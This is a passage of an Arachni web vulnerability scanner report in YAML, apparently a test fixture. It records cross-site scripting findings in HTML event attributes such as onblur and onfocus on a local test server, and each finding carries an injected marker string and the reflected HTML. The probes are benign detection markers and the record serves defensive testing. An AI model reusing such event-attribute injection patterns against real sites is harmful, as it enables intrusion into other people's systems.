    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: link
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/link/onblur?input=default
      :id: <a href="/" onblur="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onblur</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onblur=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onblur</a><a href='/' onblur="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onblur</a><a href='/' onblur='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onblur</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/link/onblur?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: link
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/link/onchange?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "415"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onchange="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onchange</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: link
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/link/onchange?input=default
      :id: <a href="/" onchange="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onchange</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onchange=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onchange</a><a href='/' onchange="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onchange</a><a href='/' onchange='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onchange</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/link/onchange?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: link
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/link/onfocus?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "409"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onfocus="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onfocus</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: link
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/link/onfocus?input=default
      :id: <a href="/" onfocus="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onfocus</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onfocus=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onfocus</a><a href='/' onfocus="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onfocus</a><a href='/' onfocus='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onfocus</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/link/onfocus?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: link
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/link/onreset?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "409"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onreset="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onreset</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: link
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/link/onreset?input=default
      :id: <a href="/" onreset="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onreset</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onreset=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onreset</a><a href='/' onreset="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onreset</a><a href='/' onreset='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onreset</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/link/onreset?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: link
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/link/onselect?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "415"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onselect="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onselect</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: link
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/link/onselect?input=default
      :id: <a href="/" onselect="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onselect</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onselect=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onselect</a><a href='/' onselect="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onselect</a><a href='/' onselect='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onselect</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/link/onselect?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: link
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/link/onsubmit?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "415"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onsubmit="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onsubmit</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: link
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/link/onsubmit?input=default
      :id: <a href="/" onsubmit="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onsubmit</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onsubmit=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onsubmit</a><a href='/' onsubmit="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onsubmit</a><a href='/' onsubmit='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onsubmit</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/link/onsubmit?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: link
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/link/onabort?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "409"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onabort="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onabort</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: link
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/link/onabort?input=default
      :id: <a href="/" onabort="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onabort</a>
      :regexp: ""
    references: 
      ha.ckers: http://ha.ckers.org/xss.html
      Secunia: http://secunia.com/advisories/9716/
    regexp: ""
    regexp_match: 
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being included in executable code or not be included at all.
    response: <a href='/' onabort=default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//>onabort</a><a href='/' onabort="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onabort</a><a href='/' onabort='default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//'>onabort</a>
    severity: High
    tags: 
    - xss
    - event
    - injection
    - regexp
    - dom
    - attribute
    url: http://localhost:10012/link/onabort?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "79"
  cwe_url: http://cwe.mitre.org/data/definitions/79.html
  description: |-
    Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
        This makes Cross-Site Scripting attacks much easier to mount since the user input
        lands in code waiting to be executed.
  elem: link
  internal_modname: XSSEvent
  method: GET
  mod_name: XSS in HTML element event attribute
  name: Cross-Site Scripting in event tag of HTML element.
  references: 
    ha.ckers: http://ha.ckers.org/xss.html
    Secunia: http://secunia.com/advisories/9716/
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being included in executable code or not be included at all.
  severity: High
  tags: 
  - xss
  - event
  - injection
  - regexp
  - dom
  - attribute
  url: http://localhost:10012/link/onkeydown?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "79"
    cwe_url: http://cwe.mitre.org/data/definitions/79.html
    description: |-
      Unvalidated user input is being embedded inside an HMTL event element such as "onmouseover".
          This makes Cross-Site Scripting attacks much easier to mount since the user input
          lands in code waiting to be executed.
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: onload=default-onload;onunload=default-onunload;onblur=default-onblur;onchange=default-onchange;onfocus=default-onfocus;onreset=default-onreset;onselect=default-onselect;onsubmit=default-onsubmit;onabort=default-onabort;onkeydown=default-onkeydown;onkeypress=default-onkeypress;onkeyup=default-onkeyup;onclick=default-onclick;ondblclick=default-ondblclick;onmousedown=default-onmousedown;onmousemove=default-onmousemove;onmouseout=default-onmouseout;onmouseover=default-onmouseover;onmouseup=default-onmouseup;src=default-src
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "421"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: <a href="/" onkeydown="default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//">onkeydown</a>
    injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
    internal_modname: XSSEvent
    method: GET
    mod_name: XSS in HTML element event attribute
    name: Cross-Site Scripting in event tag of HTML element.
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 2
      :injected_orig: ;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :altered: input
      :element: link
      :params: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :follow_location: true
      :injected: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :combo: 
        input: default;arachni_xss_in_element_event=71da6143bd299d0dac635e2dbf2d0f804fdfa4aa20be08b2aab53f0444373bb1//
      :action: http://localhost:10012/link/onkeydown?input=default
